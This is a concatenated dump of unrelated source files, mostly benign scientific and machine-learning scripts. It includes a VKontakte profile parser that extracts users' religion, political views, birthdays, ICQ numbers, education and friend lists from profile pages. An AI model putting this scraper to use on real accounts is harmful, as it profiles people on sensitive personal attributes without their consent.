encoding=\"ISO-8859-1\", newline='') as report_file:\n wr = csv.writer(report_file)\n wr.writerow((\"Train accuracy\", \"Test accuracy\"))\n wr.writerows(export_data)\n report_file.close()\n\n if (args.save_model):\n torch.save(model.state_dict(), \"../model/mnist_cnn.pt\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/mnist_cnn.py","file_name":"mnist_cnn.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103122524","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom components.parser import Parser\nfrom components.person import Person\n\nclass VkontakteParser(Parser):\n def __init__(self):\n Parser.__init__(self)\n self.person = None\n\n def parse(self, id, html):\n self.person = Person()\n self.person.id = id\n self.get_avatar_url(html)\n self.get_names(html)\n self.get_gender(html)\n self.get_status(html)\n self.get_birthday(html)\n self.get_town(html)\n self.get_religion(html)\n self.get_politic(html)\n self.get_icq(html)\n self.get_university(html)\n self.get_faculty(html)\n self.get_chair(html)\n self.get_edu_form(html)\n self.person.friends = self.core.get_friends(self.person.id)\n return self.person\n\n def get_avatar_url(self, html):\n \"\"\"Gets person avatar url.\"\"\"\n\n match = re.search(r'div id=.leftColumn.>[^<]*
' \\\n '[^<]*', html)\n if match:\n self.person.avatar_url = match.group(1)\n\n def get_names(self, html):\n \"\"\"Gets person firstName, secondName, nickName.\"\"\"\n\n match = re.search(r'profileName.>[^<]*

(\\D+)

[^<]*
', html)\n if match:\n idents = match.group(1).split()\n if len(idents) == 3:\n self.person.name, self.person.nickname, self.person.sname = tuple(idents)\n else:\n self.person.name, self.person.sname = tuple(idents)\n \n def get_gender(self, html):\n \"\"\"Gets person gender.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[sex\\]=..>(\\D+)' \\\n '', html)\n if match:\n self.person.gender = match.group(1)\n\n def get_status(self, html):\n \"\"\"Gets person marital status.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[status\\]=..>(\\D+)' \\\n '', html)\n if match:\n self.person.status = match.group(1)\n\n def get_birthday(self, html):\n \"\"\"Gets person birth day, month and year.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[bday\\]=(\\d+)\\&' \\\n 'c\\[bmonth\\]=(\\d+).>', html)\n if match:\n self.person.bday = int(match.group(1))\n self.person.bmonth = int(match.group(2))\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[byear\\]=(\\d+).>', html)\n if match:\n self.person.byear = int(match.group(1))\n \n def get_town(self, html):\n \"\"\"Gets person home town.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[hometown\\]=[^>]+>' \\\n '([^<]+)', html)\n if match:\n self.person.town = match.group(1)\n\n def get_religion(self, html):\n \"\"\"Gets person religion status.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[religion\\]=' \\\n '([^>]+).\\>', html)\n if match:\n self.person.religion = match.group(1)\n\n def get_politic(self, html):\n \"\"\"Gets person politic status.\"\"\"\n\n politic = re.search( \\\n r'gsearch\\.php\\?from=people\\&c\\[politic\\]=..>([^<]+)', html)\n if politic:\n self.person.politic = politic.group(1)\n\n def get_icq(self, html):\n \"\"\"Gets person ICQ id.\"\"\"\n\n match = re.search(r'class=.label.>ICQ:[^<]*' \\\n '[^<]*
([^<]*)', html)\n if match:\n number = re.search(r'(\\d+-\\d+-\\d+|\\d+)', match.group(1))\n if number:\n self.person.icq = number.group(1).replace('-', '')\n\n def get_university(self, html):\n \"\"\"Gets person university name.\"\"\"\n\n match = re.search(r'gsearch.php\\?from=people\\&c\\[uni_country\\]=\\d+\\&' \\\n 'c\\[uni_city\\]=\\d+\\&c\\[university\\]=\\d+.>([^<]+)', html)\n if match:\n self.person.university = match.group(1)\n\n def get_faculty(self, html):\n \"\"\"Gets faculty name.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[uni_country\\]=\\d+\\&c' \\\n '\\[uni_city\\]=\\d+\\&c\\[university\\]=\\d+\\&c\\[faculty\\]=\\d+.>([^<]+)<' \\\n '/a\\>', html)\n if match:\n self.person.faculty = match.group(1)\n\n def get_chair(self, html):\n \"\"\"Gets chair name.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[uni_country\\]=\\d+\\&c' \\\n '\\[uni_city\\]=\\d+\\&c\\[university\\]=\\d+\\&c\\[faculty\\]=\\d+\\&c\\[chair\\]' \\\n '=\\d+.>([^<]+)', html)\n if match:\n self.person.chair = match.group(1)\n\n def get_edu_form(self, html):\n \"\"\"Gets person education form.\"\"\"\n\n match = re.search(r'gsearch\\.php\\?from=people\\&c\\[uni_country\\]=\\d+\\&c' \\\n '\\[uni_city\\]=\\d+\\&c\\[university\\]=\\d+\\&c\\[edu_form\\]=\\d+.>([^<]+)' \\\n '', html)\n if match:\n self.person.edu_form = match.group(1)\n\n","sub_path":"vkontakte/vparser.py","file_name":"vparser.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"167842935","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCopyright 2019 TIANJI, Inc. All Rights Reserved.\n@author: HuHui\n@software: PyCharm\t\n@project: AttentionOCR\t\n@file: transform_labels.py\n@version: v1.0\n@time: 2019/12/8 下午4:20\n@setting: \n-------------------------------------------------\nDescription :\n工程文件说明: \n\"\"\"\n\nimport pickle\nimport os\n\nlabel_path = '/data/models/qmsb/v2/merge_3228_label.pkl'\nout_file = os.path.join(os.path.dirname(__file__), 'label.txt')\nf_out = open(out_file, 'w')\nf = open(label_path, 'rb')\n# alphabet = ''.join(pickle.load(f).keys())\nlabel_dict = pickle.load(f)\nfor i in range(len(label_dict)):\n character = list(label_dict.keys())[list(label_dict.values()).index(i)]\n f_out.write('{} {}\\n'.format(i, character))\nf_out.write('{} EOS\\n'.format(i + 1))\nf.close()\nf_out.close()\n","sub_path":"qmsb/transform_labels.py","file_name":"transform_labels.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"400473810","text":"n = int(input(\"Enter n: \"))\nsequence=[]\n\n# ініціалузуємо першу перестановку\nfor i in range(1,n+1):\n sequence.append(i)\nprint(sequence)\n\n# створюємо допоміжний двовимірний масив, кожен елемент якого має вигляд [-1, n],\n# де -1 це напрямок стрілки ліворуч (1 - праворуч)\nindices = range(1, n+1)\nstate = [[-1, idx] for idx in indices]\nstate = [[-1, n+1]] + state + [[-1, n+1]]\n\nwhile True:\n # 1.Знаходимо найбільше мобільне число\n mobile = -1\n for idx in indices: #1, 2 ... n\n direction, value = state[idx]\n if value > mobile and value > state[idx+direction][1]:\n # число є мобільним і більшим ніж попереднє мобільне число\n mobile = value\n mobile_index = idx\n mobile_direction = direction\n if mobile == n:\n break\n if mobile == -1:\n # немає мобільних чисел, тобто перестановки завершено\n break\n\n # 2.Міняємо місцями мобільне число з сусіднім числом, на яке показує стрілка\n sees = mobile_index + mobile_direction\n # оновлюємо допоміжну множину перестановок (двовимірний масив)\n state[mobile_index], state[sees] = state[sees], state[mobile_index]\n # оновлюємо множину перестановок\n sequence[mobile_index-1], sequence[sees-1] = sequence[sees-1], sequence[mobile_index-1]\n print(sequence)\n\n # 3.Змінюємо напрямок стрілок у всіх чисел більших за мобільне число\n if mobile mobile:\n state[idx][0] = -state[idx][0]","sub_path":"Jonson-TrottersAlgorithm.py","file_name":"Jonson-TrottersAlgorithm.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"326936553","text":"import yaml\nimport netmiko\n\nfilename = input(\"Enter Filename\")\n\nwith open(filename) as f:\n yaml_out = yaml.load(f)\n \n for keys in yaml_out:\n net_connect = netmiko.ConnectHandler()\n net_connect(**keys)\n print (net_connect.prompt())\n \n\nprint(yaml_out)\n","sub_path":"class3_practice_2b.py","file_name":"class3_practice_2b.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"204844064","text":"\"\"\"Define an experiment to explore joint decision making.\"\"\"\n\nfrom dallinger.experiments import Experiment\nfrom dallinger.models import Network, Node, Info\nfrom sqlalchemy import Integer\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom sqlalchemy.sql.expression import cast\nfrom dallinger.nodes import Source\nfrom random import randint\nimport json\n\n\nclass JointEstimation(Experiment):\n \"\"\"An experiment for joint perception.\"\"\"\n\n def __init__(self, session):\n \"\"\"Call the same function in the super (see experiments.py in dallinger).\n\n A few properties are then overwritten. Finally, setup() is called.\n \"\"\"\n super(JointEstimation, self).__init__(session)\n import models\n self.models = models\n self.experiment_repeats = 1\n self.setup()\n self.num_participants = 10 # desired total participants, not dyads\n self.initial_recruitment_size = 10\n self.completion_bonus_payment = .33\n self.accuracy_bonus_payment = 2\n self.total_test_trials = 15\n\n def create_network(self):\n \"\"\"Create a new network.\"\"\"\n return self.models.Paired()\n\n def create_node(self, participant, network):\n \"\"\"Create a new node.\"\"\"\n return self.models.Indexed(participant=participant, network=network)\n\n def setup(self):\n \"\"\"Create networks. Add a source if the networks don't yet exist.\"\"\"\n if not self.networks():\n for _ in range(self.practice_repeats):\n network = self.create_network()\n network.role = \"practice\"\n self.session.add(network)\n self.models.ListSource(network=network)\n for _ in range(self.experiment_repeats):\n network = self.create_network()\n network.role = \"experiment\"\n self.session.add(network)\n self.models.ListSource(network=network)\n self.session.commit()\n\n def bonus(self, participant):\n \"\"\"Calculate a participant's bonus.\"\"\"\n\n # Get only the \"info\" from target participant's nodes.\n all_nodes = participant.nodes()\n experiment_nodes = [n for n in all_nodes if n.network.role == \"experiment\"]\n nested_infos = [n.infos() for n in experiment_nodes]\n flattened_infos = [info_item for info_list in nested_infos for info_item in info_list]\n\n # Grab their final accuracy scores.\n score = [float(info.property3) for info in flattened_infos] # get the accuracy of the infos\n\n # If they timed out, give them no bonuses.\n if -9999999999999999999999999999 in score:\n bonus = 0.0\n\n # Otherwise,\n else:\n score = filter(lambda a: a > 0, score)\n score = score + [0] * (self.total_test_trials - len(score))\n mean_accuracy = float(sum(score))/float(self.total_test_trials)\n bonus = round(min((self.accuracy_bonus_payment+self.completion_bonus_payment), max(0.0, ((mean_accuracy * self.accuracy_bonus_payment) + self.completion_bonus_payment))),2)\n return bonus\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"277512693","text":"# Basic Skip Gram model\n\nfrom keras.layers import merge, Dense, Reshape, Dot\nfrom keras.layers.embeddings import Embedding\nfrom keras.models import Sequential, Model\n\nfrom keras.preprocessing.text import *\nfrom keras.preprocessing.sequence import skipgrams\n\nVOCAB_SIZE = 5000\nEMBED_SIZE = 300\n\n'''\nword_model = Sequential()\nword_model.add(Embedding(VOCAB_SIZE, EMBED_SIZE, embeddings_initializer='glorot_uniform', input_length=1))\nword_model.add(Reshape(EMBED_SIZE, ))\n\ncontext_model = Sequential()\ncontext_model.add(Embedding(VOCAB_SIZE, EMBED_SIZE, embeddings_initializer='glorot_uniform', input_length=1))\ncontext_model.add(Reshape(EMBED_SIZE, ))\n\nmergedOut = Dot()([word_model.output,context_model.output])\nmergedOut = Dense(1, activation='sigmoid')(mergedOut)\nmodel = Model([word_model.input, context_model.input], mergedOut)\n'''\ntext = \"I love green eggs and ham .\"\ntokenizer = Tokenizer()\n\ntokenizer.fit_on_texts([text])\n\nword2id = tokenizer.word_index\nid2word = {v:k for k, v in word2id.items()}\n\nwids = [word2id[w] for w in text_to_word_sequence(text)]\npairs, labels = skipgrams(wids, len(word2id))\nprint(len(pairs), len(labels))\nfor i in range(10):\n print(\"({:s} ({:d}), {:s} ({:d})) -> {:d}\".format(\n id2word[pairs[i][0]], pairs[i][0],\n id2word[pairs[i][1]], pairs[i][1],\n labels[i]))\n\n\n\n\n","sub_path":"dl_with_keras/word_embeddings/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"283348630","text":"#\n# Project : \"Station de qualité de l'air Lora\"\n#\n# Copyright (C) 2019 Yohann LE GALL & Sergio QUINTERO\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n\n# Simple GPS module demonstration.\n# Will wait for a fix and print a message every second with the current location\n# and other details.\nfrom machine import UART\nfrom machine import Pin\nimport utime as time\n\nfrom lib import adafruit_gps\n\n#Initialize UART\nuart = UART(1, baudrate=9600, timeout_chars=3000, pins=('P4', 'P3'))\n\n#Instanciate a Pin object linked to the enable pin of the GPS\nen_pin = Pin('P23', mode=Pin.OUT)\n\n#Instantiaite a GPS object\ngps = adafruit_gps.GPS(uart, en_pin)\n\n#Turns ON GPS (turn off using dps.disbale())\ngps.enable()\n\n# Turn on the basic GGA and RMC info (what you typically want)\ngps.send_command('PMTK314,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')\n\n# Set update rate to once a second (1hz).\ngps.send_command('PMTK220,1000')\n# Set update rate to once every two second (0.5hz).\n#gps.send_command('PMTK220,2000')\n# Set update rate to twice a second (2hz).\n#gps.send_command('PMTK220,500')\n\n# Main loop runs forever printing the location, etc. every second.\nlast_print = time.ticks_ms()\nwhile True:\n # Make sure to call gps.update() as often as possible to prevent loss\n # of data.\n # This returns a bool that's true if it parsed new data.\n gps.update()\n # Every second print out current location details if there's a fix.\n current = time.ticks_ms()\n if time.ticks_diff(last_print, current) >= 1000:\n last_print = current\n\n if not gps.has_fix:\n # Try again if we don't have a fix yet.\n print('Waiting for fix...')\n continue\n\n # We have a fix! (gps.has_fix is true)\n # Print out details about the fix like location, date, etc.\n print('=' * 40) # Print a separator line.\n print('Fix timestamp: {}/{}/{} {:02}:{:02}:{:02}'.format(\n gps.timestamp_utc[1], # Grab parts of the time from the\n gps.timestamp_utc[2], # struct_time object that holds\n gps.timestamp_utc[0], # the fix time. Note you might\n gps.timestamp_utc[3], # not get all data like year, day,\n gps.timestamp_utc[4], # month!\n gps.timestamp_utc[5]))\n print('Latitude: {} degrees'.format(gps.latitude))\n print('Longitude: {} degrees'.format(gps.longitude))\n print('Fix quality: {}'.format(gps.fix_quality))\n # Some attributes beyond latitude, longitude and timestamp are optional\n # and might not be present. Check if they're None before trying to use!\n if gps.satellites is not None:\n print('# satellites: {}'.format(gps.satellites))\n if gps.altitude_m is not None:\n print('Altitude: {} meters'.format(gps.altitude_m))\n if gps.track_angle_deg is not None:\n print('Speed: {} knots'.format(gps.speed_knots))\n if gps.track_angle_deg is not None:\n print('Track angle: {} degrees'.format(gps.track_angle_deg))\n if gps.horizontal_dilution is not None:\n print('Horizontal dilution: {}'.format(gps.horizontal_dilution))\n if gps.height_geoid is not None:\n print('Height geo ID: {} meters'.format(gps.height_geoid))\n","sub_path":"tests/gps_simpletest.py","file_name":"gps_simpletest.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"632794575","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 5 11:20:29 2018\n\n@author: sulem\n\"\"\"\n\nfrom rdkit import Chem\nfrom rdkit.Chem import ChemicalFeatures\nfrom rdkit import RDConfig\n\nfrom preprocessing.atom import *\n\nclass Molecule():\n \n #Constructor\n def __init__(self,atoms=None,bonds=None,tag=None,ident=None,\n A=0.0,B=0.0,C=0.0,mu=0.0,alpha=0.0,\n homo=0.0,lumo=0.0,r2=0.0,zpve=0.0,\n U0=0.0,U=0.0,H=0.0,G=0.0,Cv=0.0,frequencies=None,\n smile=None,chemMol=None):\n \n self.tag = tag\n self.ident = ident\n \n self.atoms = atoms\n self.bonds = bonds\n if (atoms == None):\n self.Na = 0\n else: \n self.Na = len(atoms)\n \n self.A = A\n self.B = B\n self.C = C\n self.mu = mu\n self.alpha = alpha\n self.homo = homo\n self.lumo = lumo\n self.gap = lumo - homo\n self.r2 = r2\n self.zpve = zpve\n self.U0 = U0\n self.U = U\n self.H = H\n self.G = G\n self.Cv = Cv\n self.freq = frequencies\n self.smile = smile\n self.chemMol = chemMol\n \n \n def add_atom(self,atom):\n \n if (self.atoms == None):\n self.atoms = []\n self.atoms.append(atom)\n self.Na += 1\n \n \n def add_bond(self,atom1,atom2,bond=1.0,distance=0.0):\n \n self.bonds.append(Chemic_bond(atom1,atom2,bond,distance))\n \n \n def add_atom_coord(self,i,coord):\n self.atoms[i].coord = coord\n \n \n def add_atom_pc(self,i,pc):\n self.atoms[i].pc = pc\n \n \n def get_atomlist(self):\n \n return ([a.symb for a in self.atoms])\n \n \n \n \n \n \n ","sub_path":"preprocessing/molecule.py","file_name":"molecule.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"500038637","text":"import sugartensor as tf\nfrom data import SpeechCorpus\nfrom data_ch import voca_size\nfrom model import *\n\n__author__ = 'namju.kim@kakaobrain.com'\n\n# set log level to debug\ntf.sg_verbosity(10)\n\n#\n# hyper parameters\n#\n\nbatch_size = 16 # total batch size\n\n#\n# inputs\n#\n\n# corpus input tensor\ndata = SpeechCorpus(batch_size=batch_size * tf.sg_gpus())\n\n# mfcc feature of audio\ninputs = tf.split(data.mfcc, tf.sg_gpus(), axis=0)\n# target sentence label\nlabels = tf.split(data.label, tf.sg_gpus(), axis=0)\n# sequence length except zero-padding\nseq_len = []\nfor input_ in inputs:\n seq_len.append(tf.not_equal(input_.sg_sum(axis=2), 0.).sg_int().sg_sum(axis=1))\n\n\n# parallel loss tower\n@tf.sg_parallel\ndef get_loss(opt):\n # encode audio feature\n logit = get_logit(opt.input[opt.gpu_index], voca_size=voca_size)\n for i in tf.get_collection(\"regularization_losses\"):\n print(i)\n print('--------------------')\n\n train_list = tf.trainable_variables()\n\n var_list = tf.global_variables()\n real_var_list = []\n for item in var_list:\n # print(item)\n if 'W' in item.name:\n real_var_list.append(item)\n\n loss = logit.sg_ctc(target=opt.target[opt.gpu_index], seq_len=opt.seq_len[opt.gpu_index])\n # print(loss)\n # tf.add_to_collection(\"losses\", loss)\n # losses = tf.get_collection(\"losses\")\n # losses += tf.get_collection(\"regularization_losses\")\n # for i in tf.get_collection(\"losses\"):\n # print(i.name)\n # print('++++++++++++++++++++')\n # total_loss = tf.add_n(losses, name='total_loss')\n # for item in real_var_list:\n # loss += 0.03 * tf.nn.l2_loss(item)\n\n # for i in tf.get_collection(\"regularization_losses\"):\n # loss += 0.03 * i\n\n regular_loss = tf.sg_regularizer_loss(0.03)\n loss += regular_loss\n return loss\n\n\n#\n# train\n#\ntf.sg_train(lr=0.0001, loss=get_loss(input=inputs, target=labels, seq_len=seq_len),\n ep_size=data.num_batch, max_ep=50)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"404969156","text":"info= [int(x) for x in input('').split(' ')]\narr = [int(x) for x in input('').split(' ')]\nsub = [int(x) for x in input('').split(' ')]\nn = 0\nindex = n\nwhile n < (len(arr)-len(sub)+1):\n index = n\n for x in range(len(sub)):\n if arr[n+x] != sub[x]:\n index = -1\n break\n if index != -1:\n break\n n += 1\nprint(index)\n \n","sub_path":"auacm/arraysearch.py","file_name":"arraysearch.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"360231562","text":"#!/usr/bin/python\n\"\"\"beam_full_EE.py\nDetermine complex voltage response of an aperture array modelled as embedded elements, \nrepresented by spherical harmonics. \n\nUsage:\nAn ApertureArray object is created for a target frequency.\nA Beam object takes an ApertureArray object and antenna delays and amplitude \nas input, calculates the beam response as the weighted sum of \nthe spherical harmonics of the embedded elements.\nThe Beam object can then be queried to return the response at \nspherical coordinates or interest, to an arbitrary angular resolution.\nThe response can either be calculated at the given points, or for faster \nprocessing, interpolated from a gridded beam.\n\nA gridded beam is significantly faster for a large number of points, \nas the time-consuming calculation of the response \nneed only be done once for each theta (ZA) and each phi (az) angle. \nThe calculation for each (theta,phi) point is then a simple multiplication.\nA linear interpolation from the gridded beam is required as the \nslant orthographic projection results in many unique theta (ZA) and phi (az) points, \nbut this is also relatively fast.\n\nIf this module is run stand-alone, \nthe a beam will be generated and the various outputs plotted.\n\nOriginal Matlab code by Adrian Sutinjo. Ported to Python by Tim Colegate. \nSee:\nCalculating Far-Field Radiation Based on FEKO\n Spherical Wave Coefficients, draft 10 June 2015\n \n\"\"\"\n\nimport numpy as np\nimport logging, os\nimport math\nfrom scipy import misc\nfrom scipy.special import lpmv #associated Legendre function\nfrom mwapy import pb\nimport datetime #For info-level logging\n\nlogging.basicConfig(format='# %(levelname)s:%(name)s: %(message)s')\nlogger=logging.getLogger(__name__) # default logger level is WARNING\n#logger.setLevel('WARNING')\n\ntry:\n import h5py\nexcept ImportError:\n logger.warning(\"Cannot import h5py module -> Full Embedded Model cannot be used, but other beam models should work fine\")\n \n\ndeg2rad=math.pi/180\nrad2deg=180/math.pi\n\n#Todo: check scipy.__version__ >= '0.15.1'\n\n\nclass ApertureArray:\n \"\"\"Generic aperture array class\"\"\"\n#TODO: add some checks to h5 file. e.g. check n_ant matches number in h5 file.\n#TODO: in the beam modelling, there is still 16 antenna hardcoded. This needs fixing.\n def __init__(self, h5filepath, target_freq_Hz, n_ant=16):\n #freq_interp=nearest, linear\n \"\"\"Constructor for beamformed aperture array. \n Input: \n h5filepath - path to h5 file containing coefficients\n target_freq_Hz - frequency at which beam model is required\n n_ant - number of antennas in array/tile\"\"\"\n logger.info('New model of the physical tile, modelled using full embedded element patterns with the beam described by spherical harmonics.')\n logger.info('This new beam model is still being tested and is not an official release')\n logger.info('Code version date: 2016-02-15')\n \n #load h5file\n if not os.path.exists(h5filepath):\n logger.error('Cannot file beam model file %s' % h5filepath)\n self.h5f=None\n else:\n logger.debug('Loading beam model from file %s' % h5filepath)\n self.h5f = h5py.File(h5filepath,'r')\n\n # read and log version information :\n self.h5_file_version=pb.h5fileversion\n logger.debug(\"H5 file (%s) version = %s\" % (h5filepath,self.h5_file_version)) \n\n # Find available frequencies in h5 file\n freqs=np.array([int(x[3:]) for x in self.h5f.keys() if 'X1_' in x])\n freqs.sort()\n\n # find the nearest freq lookup table\n pos = np.argmin(np.abs(freqs - target_freq_Hz))\n self.freq=freqs[pos]\n logger.info(\"%s MHz requested, selecting nearest freq: %s MHz\"%(target_freq_Hz/1.e6, self.freq/1.e6))\n\n self.n_ant=n_ant\n\n def calc_zenith_norm_fac(self):\n \"\"\"Calculate normalisation factors for the Jones vector for this \n ApertureArray object. For MWA, these are at the zenith of a zenith pointed beam,\n which is the maximum for all beam pointings. \n The FEKO simulations include all ph angles at za=0. These are not redundant, \n and the ph value determines the unit vector directions of both axes. \n For the E-W dipoles, the projection of the theta unit vec will be max when \n pointing east, i.e. when ph_EtN=0 (ph_NtE=90). For the phi unit vec, \n this will be when ph_EtN=-90 or 90 (ph_NtE=180 or 0: we use 180)\n For the N-S dipoles, projection of ZA onto N-S is max az ph_EtN=90 (ph_NtE=0) and\n proj of ph onto N-S is max when ph_EtN=0 (ph_NtE=90)\"\"\"\n \n mybeam=Beam(self, delays=np.zeros([2,16]), amps=np.ones([2,16]))\n self.norm_fac=np.zeros((2,2),dtype=np.complex128)\n \n #fill in Jones matrix\n max_phis=[[math.pi/2,math.pi],[0,math.pi/2]] #phi where each Jones vector is max \n for i in [0,1]:\n for ii in [0,1]:\n self.norm_fac[i][ii]=\\\n mybeam.get_response(max_phis[i][ii], 0)[i][ii][0]\n \n def apply_zenith_norm_Jones(self, j):\n \"\"\"Apply zenith normalisation factor to the Jones matrix\n \n Input:\n j - Jones matrix for one or more spherical cordinates\n \"\"\"\n if not hasattr(self, 'norm_fac'):\n self.calc_zenith_norm_fac()\n #Resize to extra dimensions for subsequent broadcasting during normalisation\n mynorm_fac=np.copy(self.norm_fac)\n for i in range(len(j.shape)-2):\n mynorm_fac=np.expand_dims(mynorm_fac,axis=2)\n return j/mynorm_fac #Normalise\n \n\nclass Beam:\n def __init__(self, AA, delays=np.zeros([2,16]), amps=np.ones([2,16])):\n \"\"\"Constructor for aperture array beam of given pointing direction\n and angular resolution.\n Spherical harmonics modes and coefficients are accumulated for\n a pointing defined by delays and amps.\n \n The format of the modes and coefficients is as follows: \n Q1,2 is Q1,2mn column vector with m=[-n:n].' and n=[111]....[n,..n].' \n M and N assume FEKO M and N vector order, e.g,...: \n -----------M, N------------\n -1 1\n 0 1\n 1 1\n -2 2\n -1 2\n 0 2\n 1 2\n 2 2\n .. ..\n -nmax nmax\n .. ..\n 0 nmax\n .. ..\n nmax nmax\n \n Input:\n AA - aperture array object antenna object\n freq - frequency of interest (Hz) \n delays - 2-D array of MWA beamformer delay steps as numpy array shape (2,16),\n although a (16,) list or a (16,) array will also be accepted \n 1st dimension is the antenna pol (NS, EW) \n 2nd dimension is the antenna number\n amps - 2-D array of antenna amplitudes. These are absolute values \n (i.e. relatable to physical units) \n pixels_per_deg - angular resolution, being the number of pixels per degree along Az and ZA axes\"\"\"\n \n self.AA=AA\n \n # Check valid amplitudes\n try:\n if isinstance(amps,list):\n amps=np.array(amps) \n if amps.shape == (16,):\n logger.warning('Assuming set of 16 antenna amplitudes are apply to both X Y dipoles')\n amps=np.tile(amps, (2,1))\n except:\n e = 'Unable to convert amplitudes \"%s\" to shape (2,16)' % (amps)\n logger.error(e)\n raise ValueError(e)\n if amps.shape != (2,16):\n e = 'Amplitudes \"%s\" are not shape (2,16)' % (amps)\n logger.error(e)\n raise ValueError(e)\n\n# #TODO: read number of antennas (i.e. delays) from h5 file\n # Check valid delays\n try:\n if isinstance(delays,list):\n delays=np.array(delays) \n if delays.shape == (16,):\n logger.warning('Assuming set of 16 antenna delays apply to both X and Y dipoles')\n delays=np.tile(delays, (2,1))\n except:\n e = 'Unable to convert delays \"%s\" to shape (2,16)' % (delays)\n logger.error(e)\n raise ValueError(e)\n if delays.shape != (2,16):\n e = 'Delays \"%s\" are not shape (2,16)' % (delays)\n logger.error(e)\n raise ValueError(e)\n \n if (delays >32).any():\n e = 'There are delays greater than 32: \"%s\"' % (delays)\n logger.error(e)\n raise ValueError(e)\n \n #check for terminated dipoles and reset delays and amps\n terminated=delays==32\n if (terminated).any():\n logger.warning('Terminated dipoles (delay setting 32)... setting amplitude and delay to zero.')\n delays[terminated]=0\n amps[terminated]=0\n \n logger.info('Using delays X=%s, Y=%s'%(delays[0], delays[1]))\n self.delays=delays\n \n logger.info('Using amplitudes X=%s, Y=%s'%(amps[0], amps[1]))\n self.amps=amps \n \n \n self.calc_beam_modes()\n \n def calc_beam_modes(self):\n \"\"\"Calculate (accumulate) modes for beam object initialised \n with delays and amplitudes\"\"\"\n self.beam_modes={}\n pols=['X','Y']\n for pol in [0,1]:\n logger.debug('Calculate (accumulate) modes for %s-pol beam. Time is %s'%(pols[pol],datetime.datetime.now().time()))\n #Calculate complex excitation voltages\n phases=2*math.pi*self.AA.freq*-self.delays[pol]*435e-12 #convert delay to phase \n Vcplx=self.amps[pol]*np.exp(1.0j*phases) #complex excitation col voltage\n \n #sum up modes to create beam described by spherical harmonics \n logger.debug('determine theta-dependent component...')\n\n #finding maximum length of modes for this frequency\n max_length=0 #initialize\n n_ant=self.AA.n_ant#Was hardcoded to 16\n for ant_i in range(n_ant):\n #select spherical wave table\n name='%s%s_%s'%(pols[pol],ant_i+1,self.AA.freq)\n \n #find maximum length\n if self.AA.h5f[name].shape[1]/2 > max_length:\n max_length=self.AA.h5f[name].shape[1]/2\n \n #accumulating spherical harmonics coefficients for the array\n #initialize\n Q1_accum=np.zeros(max_length,dtype=np.complex128)\n Q2_accum=np.zeros(max_length,dtype=np.complex128)\n \n #Read in modes\n Q_modes_all = self.AA.h5f['modes'].value.T\n Nmax=0\n for ant_i in range(n_ant):\n #re-initialise Q1 and Q2 for every antenna\n Q1=np.zeros(max_length,dtype=np.complex128)\n Q2=np.zeros(max_length,dtype=np.complex128)\n\n #select spherical wave table\n name='%s%s_%s'%(pols[pol],ant_i+1,self.AA.freq)\n Q_all = self.AA.h5f[name].value.T\n\n #current length\n my_len=np.max(Q_all.shape)\n my_len_half=my_len/2\n \n Q_modes = Q_modes_all[0:my_len,:] #Get modes for this antenna\n \n #convert Qall to M, N, Q1, Q2 vectors for processing\n\n #find s=1 and s=2 indices\n #only find s1 and s2 for this antenna\n s1=Q_modes[0:my_len,0]<=1\n s2=Q_modes[0:my_len,0]>1\n\n #grab m,n vectors\n M=Q_modes[s1,1]\n N=Q_modes[s1,2]\n \n #update to the larger M and N \n if np.max(N)>Nmax:\n M_accum=M\n N_accum=N\n Nmax=np.max(N_accum)\n\n #grab Q1mn and Q2mn and make them complex\n Q1[0:my_len_half]=Q_all[s1,0]*np.exp(1.0j*Q_all[s1,1]*deg2rad)\n 